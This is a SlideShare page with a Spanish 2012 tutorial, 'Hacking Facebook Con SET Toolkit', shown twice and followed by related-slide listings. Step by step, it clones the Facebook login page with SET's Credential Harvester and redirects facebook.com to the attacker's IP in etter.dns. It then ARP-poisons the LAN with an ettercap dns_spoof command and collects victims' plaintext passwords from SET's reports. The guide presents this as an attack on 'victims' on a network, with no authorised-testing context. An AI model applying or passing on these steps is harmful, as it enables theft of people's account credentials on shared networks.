SlideShare a Scribd company logo
1 of 4
Academia Código Libre   www.codigolibre.org www.acl.edu.do
__________________________________________________________________________________
Hacking Facebook Con SET Toolkit
Diciembre 2012
Documentacion Realizada Por:
Michael Cruz Sanchez
GNU/Instructor
Herramientas A Utilizar:
1. SET (Social-Engineer Toolkit)
2. Ettercap
3. Centos 6.3
4. Metasploit Framework
Descargar y instalar metasploit en /opt
(http://downloads.metasploit.com/data/releases/metasploit-latest-linux-
installer.run)
Descargar y instalar SET en /opt(svn co
http://svn.trustedsec.com/social_engineering_toolkit set/)
Instalar ettercap
# yum install ettercap* -y
NOTA: Este es un manual paso a paso de como efectuar un ataque a facebook con
las herramientas SET, metasploit y ettercap, algunos conceptos tendran que
buscarlos en google para mejor entendimiento. Ya que este manual en parte no
esta dirigido a principiantes.
Social-Engenieer Toolkit es un juego de herramientas de explotacion creado por
David Kennedy y la comunidad, en la cual han incorporado los ataques nunca visto
en una herramienta similar. Los ataques integrados en el kit de herramientas se
han desarrollado para ser dirigidos a personas o empresas, o como modo de pruebas
Paqueteria Debian
Academia Código Libre   www.codigolibre.org www.acl.edu.do
de penetracion de sistemas. Es la herramienta que utilizaremos para clonar la
pagina de Facebook.
Ettercap es una herramienta de sniffing y seguridad de redes para M-I-M (Main In
The Middle Attack)http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle en LAN, se ejecuta en
varios sistemas operativos tipo Unix como GNU/Linux, Mac OS X, BSD y Solaris, y en
Microsoft Window. Es capaz de interceptar trafico en un segmento de red, la
captura de claves, y la realizacion de escucha activa contra una serie de
protocolos comunes. Esta clasificado en el numero 11 de los Top 100 Network
Security dada a conocer por insecure.org en 2006.
Imagen de un ataque M-I-M
Escenario De Ataque:
1. Elegir una pagina al cual atacar, y clonarla con SET
2. Inicar un ataque Main In The Middle entre la victima y el router
3. Spoofear la pagina a tu direccion ip
4. Esperar a que la victima acceda a la pagina
Paqueteria Debian
Academia Código Libre   www.codigolibre.org www.acl.edu.do
Paso 1: www.facebook.com
En nuestro caso elegimos facebook para clonar, iniciamos la herramienta SET desde
nuestro shell.
#/opt/./set
Luego de que nuestra herramienta SET se inicie nos mostrara varias opciones,
pulsamos la opcion numero 1) Social-Engineering Attacks.
Luego la opcion numero 2) Website Attack Vectors, para luego ir a la opcion numero
3) Credential Harvester Attack Method, una vez pulsada esa opcion volvemos a la
opcion 2) Site Cloner. Aqui nos pedira que pongamos nuestra direccion ip, en mi
caso es 192.168.100.92 cambiar por la direccion ip correcta de su tarjeta de red,
luego nos dira Enter the url to clone:___________ aqui pondremos www.facebook.com.
En esta parte que estamos haciendo es redireccionando la direccion web
www.facebook.com a nuestra direccion ip, asi la maquina victima creera que nuestra
maquina es facebook y nos enviara toda la informacion en archvios html generados
por la herramienta SET.
Antes de lanzar el Dns-spoofing (buscar wikipedia) con la herramienta ettercap
tenemos que editar el archivo de configuracion /usr/share/ettercap/etter.dns y
redireccionar facebook.com a nuestra direccion IP de la siguiente manera.
Dentro del archivo debajo de donde dice www.microsoft.com PTR 198.182.196.56
ponemos lo siguiente:
*.facebook.com A 192.168.100.92
NOTA: 192.168.100.92 es mi direccion ip cambiar este valor por el verdadero.
Con esto le estamos diciendo a ettercap que haga un spoof de facebook a nuestra
direccion ip. Osea que todas las peticiones de facebook lleguen a nuestra maquina.
Luego de todo esto nos vamos al archivo de configuracion de ettercap en /etc
llamado /etc/ettercap.conf y en la seccion donde decie LINUX deshabilitamos las
partes del comando Iptables el cual se encargara de las redirecciones.
# vim /etc/ettercap.conf
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port
-j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport
%port -j REDIRECT --to-port %rport"
Debe quedar asi, luego salimos y guardamos.
Paqueteria Debian
Academia Código Libre   www.codigolibre.org www.acl.edu.do
Ahora procedemos a lanzar ettercap para escanear los host y hacer las
redirecciones necesarias para nuestro ataque y asi poder encontrar victimas en la
red. Pueden correr ettercap graficamente ejecutando como usuario root el comando
ettercap -G pero aqui lo correremos desde la terminal, es mas productivo.
# ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
NOTA: la tarjeta de red es wlan0 porque estoy conectado desde la wireless, cambiar
por la tarjeta de red donde esten conectados.
Con esto esta todo listo solo hay que esperar que una victima acceda a facebook y
podremos ver toda la informacion en /opt/set/reports en archivos con extension
.html abrir con cualquier navegador y veran los datos de la victima en texto
plano.
Michael Cruz Sanchez
GNU/Instructor
superlinux.michael5@gmail.com
Paqueteria Debian

More Related Content

What's hot

El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hackermaster192
 
Hackers Black Book Español
Hackers Black Book EspañolHackers Black Book Español
Hackers Black Book Españoldegarden
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)Corp. Weapon's
 
Manual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICManual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICWhite Hat Mexico
 
Navegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linuxNavegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linuxFrancisco Medina
 
Introducción a Kali Linux
Introducción a Kali LinuxIntroducción a Kali Linux
Introducción a Kali LinuxFrancisco Medina
 
Proyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unixProyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unixFrancisco Medina
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Francisco Medina
 
Actividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA frameworkActividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA frameworkFrancisco Medina
 

What's hot (20)

El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hacker
 
1. ataque dns spoofing
1. ataque dns spoofing1. ataque dns spoofing
1. ataque dns spoofing
 
Ataque DNS SPOOFING
Ataque DNS SPOOFINGAtaque DNS SPOOFING
Ataque DNS SPOOFING
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux v2_re_y_des
Kali linux v2_re_y_desKali linux v2_re_y_des
Kali linux v2_re_y_des
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datos
 
Mitm (Man in the middle) part II
Mitm (Man in the middle) part IIMitm (Man in the middle) part II
Mitm (Man in the middle) part II
 
Hackers Black Book Español
Hackers Black Book EspañolHackers Black Book Español
Hackers Black Book Español
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)
 
Manual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOICManual de Seguridad Informatica sobre Ataque Web LOIC
Manual de Seguridad Informatica sobre Ataque Web LOIC
 
Navegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linuxNavegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linux
 
Introducción a Kali Linux
Introducción a Kali LinuxIntroducción a Kali Linux
Introducción a Kali Linux
 
Proyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unixProyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unix
 
Xvr 4
Xvr 4Xvr 4
Xvr 4
 
2015 2-Prácticas GN3
2015 2-Prácticas GN32015 2-Prácticas GN3
2015 2-Prácticas GN3
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
 
Actividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA frameworkActividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA framework
 
Foca
FocaFoca
Foca
 
Replay attack
Replay attackReplay attack
Replay attack
 
Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 

Similar to Introduccion al hacking con SET.

Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qosJosé Moreno
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Telefónica
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeezexavazquez
 
Tema3 herramientas educativas web j clic y hot potatoes
Tema3 herramientas educativas web j clic y hot potatoesTema3 herramientas educativas web j clic y hot potatoes
Tema3 herramientas educativas web j clic y hot potatoesadolfogcasanova
 
Jade 1 Agents principios básicos
Jade 1 Agents principios básicosJade 1 Agents principios básicos
Jade 1 Agents principios básicosOctavio Abundez
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Ricard Luquero
 
Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01pattala01
 
Seguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik FirewallSeguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik FirewallVanesa Rodríguez Percy
 
Construcción plataforma educativa en la red escolar (chamilo huayra)
 Construcción plataforma educativa en la red  escolar (chamilo huayra) Construcción plataforma educativa en la red  escolar (chamilo huayra)
Construcción plataforma educativa en la red escolar (chamilo huayra)Cristian Liberatore
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLEdson Ortega
 

Similar to Introduccion al hacking con SET. (20)

Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qos
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
 
Tema3 herramientas educativas web j clic y hot potatoes
Tema3 herramientas educativas web j clic y hot potatoesTema3 herramientas educativas web j clic y hot potatoes
Tema3 herramientas educativas web j clic y hot potatoes
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
 
Present3
Present3Present3
Present3
 
Jade 1 Agents principios básicos
Jade 1 Agents principios básicosJade 1 Agents principios básicos
Jade 1 Agents principios básicos
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Phishing
PhishingPhishing
Phishing
 
Hola mundorafaelnavarroprieto
Hola mundorafaelnavarroprietoHola mundorafaelnavarroprieto
Hola mundorafaelnavarroprieto
 
Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!
 
Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01
 
Seguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik FirewallSeguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik Firewall
 
Construcción plataforma educativa en la red escolar (chamilo huayra)
 Construcción plataforma educativa en la red  escolar (chamilo huayra) Construcción plataforma educativa en la red  escolar (chamilo huayra)
Construcción plataforma educativa en la red escolar (chamilo huayra)
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 

Recently uploaded

Unidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucionesUnidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucioneschorantina325
 
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...CENECOnline
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadJonathanHctorSilvaRo
 
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjPPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjNachisRamos
 
Las redes sociales en el mercado digital
Las redes sociales en el mercado digitalLas redes sociales en el mercado digital
Las redes sociales en el mercado digitalNayaniJulietaRamosRa
 
Emprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoEmprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoCENECOnline
 

Recently uploaded (6)

Unidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucionesUnidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disoluciones
 
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuad
 
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjPPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
 
Las redes sociales en el mercado digital
Las redes sociales en el mercado digitalLas redes sociales en el mercado digital
Las redes sociales en el mercado digital
 
Emprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoEmprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC Mexico
 

Introduccion al hacking con SET.

  • 1. Academia Código Libre   www.codigolibre.org www.acl.edu.do __________________________________________________________________________________ Hacking Facebook Con SET Toolkit Diciembre 2012 Documentacion Realizada Por: Michael Cruz Sanchez GNU/Instructor Herramientas A Utilizar: 1. SET (Social-Engineer Toolkit) 2. Ettercap 3. Centos 6.3 4. Metasploit Framework Descargar y instalar metasploit en /opt (http://downloads.metasploit.com/data/releases/metasploit-latest-linux- installer.run) Descargar y instalar SET en /opt(svn co http://svn.trustedsec.com/social_engineering_toolkit set/) Instalar ettercap # yum install ettercap* -y NOTA: Este es un manual paso a paso de como efectuar un ataque a facebook con las herramientas SET, metasploit y ettercap, algunos conceptos tendran que buscarlos en google para mejor entendimiento. Ya que este manual en parte no esta dirigido a principiantes. Social-Engenieer Toolkit es un juego de herramientas de explotacion creado por David Kennedy y la comunidad, en la cual han incorporado los ataques nunca visto en una herramienta similar. Los ataques integrados en el kit de herramientas se han desarrollado para ser dirigidos a personas o empresas, o como modo de pruebas Paqueteria Debian
  • 2. Academia Código Libre   www.codigolibre.org www.acl.edu.do de penetracion de sistemas. Es la herramienta que utilizaremos para clonar la pagina de Facebook. Ettercap es una herramienta de sniffing y seguridad de redes para M-I-M (Main In The Middle Attack)http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle en LAN, se ejecuta en varios sistemas operativos tipo Unix como GNU/Linux, Mac OS X, BSD y Solaris, y en Microsoft Window. Es capaz de interceptar trafico en un segmento de red, la captura de claves, y la realizacion de escucha activa contra una serie de protocolos comunes. Esta clasificado en el numero 11 de los Top 100 Network Security dada a conocer por insecure.org en 2006. Imagen de un ataque M-I-M Escenario De Ataque: 1. Elegir una pagina al cual atacar, y clonarla con SET 2. Inicar un ataque Main In The Middle entre la victima y el router 3. Spoofear la pagina a tu direccion ip 4. Esperar a que la victima acceda a la pagina Paqueteria Debian
  • 3. Academia Código Libre   www.codigolibre.org www.acl.edu.do Paso 1: www.facebook.com En nuestro caso elegimos facebook para clonar, iniciamos la herramienta SET desde nuestro shell. #/opt/./set Luego de que nuestra herramienta SET se inicie nos mostrara varias opciones, pulsamos la opcion numero 1) Social-Engineering Attacks. Luego la opcion numero 2) Website Attack Vectors, para luego ir a la opcion numero 3) Credential Harvester Attack Method, una vez pulsada esa opcion volvemos a la opcion 2) Site Cloner. Aqui nos pedira que pongamos nuestra direccion ip, en mi caso es 192.168.100.92 cambiar por la direccion ip correcta de su tarjeta de red, luego nos dira Enter the url to clone:___________ aqui pondremos www.facebook.com. En esta parte que estamos haciendo es redireccionando la direccion web www.facebook.com a nuestra direccion ip, asi la maquina victima creera que nuestra maquina es facebook y nos enviara toda la informacion en archvios html generados por la herramienta SET. Antes de lanzar el Dns-spoofing (buscar wikipedia) con la herramienta ettercap tenemos que editar el archivo de configuracion /usr/share/ettercap/etter.dns y redireccionar facebook.com a nuestra direccion IP de la siguiente manera. Dentro del archivo debajo de donde dice www.microsoft.com PTR 198.182.196.56 ponemos lo siguiente: *.facebook.com A 192.168.100.92 NOTA: 192.168.100.92 es mi direccion ip cambiar este valor por el verdadero. Con esto le estamos diciendo a ettercap que haga un spoof de facebook a nuestra direccion ip. Osea que todas las peticiones de facebook lleguen a nuestra maquina. Luego de todo esto nos vamos al archivo de configuracion de ettercap en /etc llamado /etc/ettercap.conf y en la seccion donde decie LINUX deshabilitamos las partes del comando Iptables el cual se encargara de las redirecciones. # vim /etc/ettercap.conf redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" Debe quedar asi, luego salimos y guardamos. Paqueteria Debian
  • 4. Academia Código Libre   www.codigolibre.org www.acl.edu.do Ahora procedemos a lanzar ettercap para escanear los host y hacer las redirecciones necesarias para nuestro ataque y asi poder encontrar victimas en la red. Pueden correr ettercap graficamente ejecutando como usuario root el comando ettercap -G pero aqui lo correremos desde la terminal, es mas productivo. # ettercap -T -q -i wlan0 -P dns_spoof -M arp // // NOTA: la tarjeta de red es wlan0 porque estoy conectado desde la wireless, cambiar por la tarjeta de red donde esten conectados. Con esto esta todo listo solo hay que esperar que una victima acceda a facebook y podremos ver toda la informacion en /opt/set/reports en archivos con extension .html abrir con cualquier navegador y veran los datos de la victima en texto plano. Michael Cruz Sanchez GNU/Instructor superlinux.michael5@gmail.com Paqueteria Debian